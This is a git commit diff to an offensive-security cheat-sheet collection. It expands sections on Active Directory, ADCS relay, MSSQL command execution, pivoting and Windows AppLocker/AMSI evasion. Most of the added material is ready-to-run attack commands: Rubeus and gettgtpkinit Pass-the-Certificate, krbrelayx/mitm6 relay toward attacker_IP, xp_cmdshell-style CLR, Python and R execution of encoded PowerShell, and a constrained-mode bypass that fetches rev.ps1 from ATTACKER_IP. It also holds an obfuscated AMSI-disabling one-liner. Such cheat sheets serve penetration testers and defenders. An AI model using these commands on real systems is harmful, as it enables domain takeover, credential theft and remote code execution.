LAPS Access + Pass the Cert + Writeable folder

This commit is contained in:
Swissky 2022-05-31 11:57:44 +02:00
parent 51aeb90623
commit 3066615cde
6 changed files with 186 additions and 80 deletions

View File

@ -82,6 +82,7 @@
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- [Pass-The-Certificate](#pass-the-certificate)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
- [GenericAll](#genericall)
@ -230,13 +231,13 @@ Use the correct collector
# run the collector on the machine using SharpHound.exe
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
.\SharpHound.exe -c all -d active.htb -SearchForest
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
.\SharpHound.exe -c all,GPOLocalGroup
.\SharpHound.exe -c all -d active.htb --searchforest
.\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
.\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c all,GPOLocalGroup --searchforest
# or run the collector on the machine using Powershell
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
@ -1467,6 +1468,14 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
```
#### Grant LAPS Access
The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
```ps1
Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
```
### Reading GMSA Password
@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local
### Active Directory Certificate Services
* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
* Find ADCS Server
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
#### ESC1 - Misconfigured Certificate Templates
@ -2247,8 +2258,10 @@ Exploitation:
```ps1
Certify.exe find /vulnerable
Certify.exe find /vulnerable /currentuser
or
# or
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
# or
certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
```
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
```ps1
@ -2394,7 +2407,7 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
* Version 1: NTLM Relay + Rubeus + PetitPotam
* **Version 1**: NTLM Relay + Rubeus + PetitPotam
```powershell
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
@ -2417,7 +2430,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
mimikatz> lsadump::dcsync /user:krbtgt
```
* Version 2: NTLM Relay + Mimikatz + Kekeo
* **Version 2**: NTLM Relay + Mimikatz + Kekeo
```powershell
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
@ -2431,7 +2444,17 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
# Mimikatz
mimikatz> lsadump::dcsync /user:krbtgt
```
* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
* **Version 3**: Kerberos Relay
```ps1
# Setup the relay
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
# Run mitm6
sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
```
* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
```powershell
https://github.com/bats3c/ADCSPwn
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
@ -2451,7 +2474,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output - Output path to store base64 generated crt.
```
* Version 4: Certipy ESC8
* **Version 5**: Certipy ESC8
```ps1
certipy relay -ca 172.16.19.100
```
@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
```
#### Pass-The-Certificate
* Windows
```ps1
# Information about a cert file
certutil -v -dump admin.pfx
# From a Base64 PFX
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
```
* Linux
```ps1
# Base64-encoded PFX certificate (string) (password can be set)
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
# PEM certificate (file) + PEM private key (file)
gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
# PFX certificate (file) + password (string, optionnal)
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
```
### Dangerous Built-in Groups Usage
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
([adsisearcher]"(AdminCount=1)").findall()
```
#### AdminSDHolder Abuse
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.

View File

@ -3,6 +3,7 @@
## Summary
* [Azure Recon Tools](#azure-recon-tools)
* [Terminology](#terminology)
* [Enumeration](#enumeration)
* [Enumerate valid emails](#enumerate-valid-emails)
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
@ -180,6 +181,16 @@
$ Create-Backdoor, Execute-Backdoor
```
## Terminology
> Basic Azure AD terminologies
* **Tenant**: An instance of Azure AD and represents a single organization.
* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.
* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory.
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
## Enumeration
### Enumerate valid emails
@ -1116,3 +1127,4 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)

View File

@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test"
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)

View File

@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
```ps1
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
select * from master..sysservers
```
### Crawl Links for a Specific Instance
```ps1
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
```
### Query Version of Linked Database
@ -286,12 +288,21 @@ Prerequisites:
* CREATE ASSEMBLY permission (or)
* ALTER ASSEMBLY permission (or)
The execution takes place with privileges of the **service account**.
### Execute commands using CLR assembly
```ps1
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
# Execute command using CLR assembly
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
or
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
# List all the stored procedures added using CLR
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
```
### Manually creating a CLR DLL and importing it
@ -385,6 +396,7 @@ GO
## OLE Automation
* :warning: Disabled by default
* The execution takes place with privileges of the **service account**.
### Execute commands using OLE automation procedures
@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
## Agent Jobs
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
### Execute commands through SQL Agent Job service
```ps1
@ -461,12 +476,21 @@ RECONFIGURE;
```ps1
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))
```
## R
```ps1
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
```
## Audit Checks
@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS
## Find databases that have been configured as trustworthy
```ps1
```sql
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
```
> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.

View File

@ -30,8 +30,17 @@
```powershell
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
# Correctly open the port on the machine
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
```
1. listenaddress is a local IP address waiting for a connection.
@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
* [Etat de lart du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)

View File

@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off
### AppLocker Enumeration
- With the GPO
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
* List AppLocker rules
```powershell
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```
* Applocker Bypass
* AppLocker Bypass
* By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
Powershell Constrained Mode
#### Powershell Constrained Mode
* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm)
* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main`
* Other bypasses
```powershell
# Check if we are in a constrained mode
$ExecutionContext.SessionState.LanguageMode
PS > &{ whoami }
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
# PowerShDLL - Powershell with no Powershell.exe via DLLs
# https://github.com/p3nt4/PowerShdll
ftp> rundll32.exe C:\temp\PowerShdll.dll,main
```
#### AMSI Bypass
Example of AMSI Bypass.
Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
```powershell
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
```
## EoP - Looting for passwords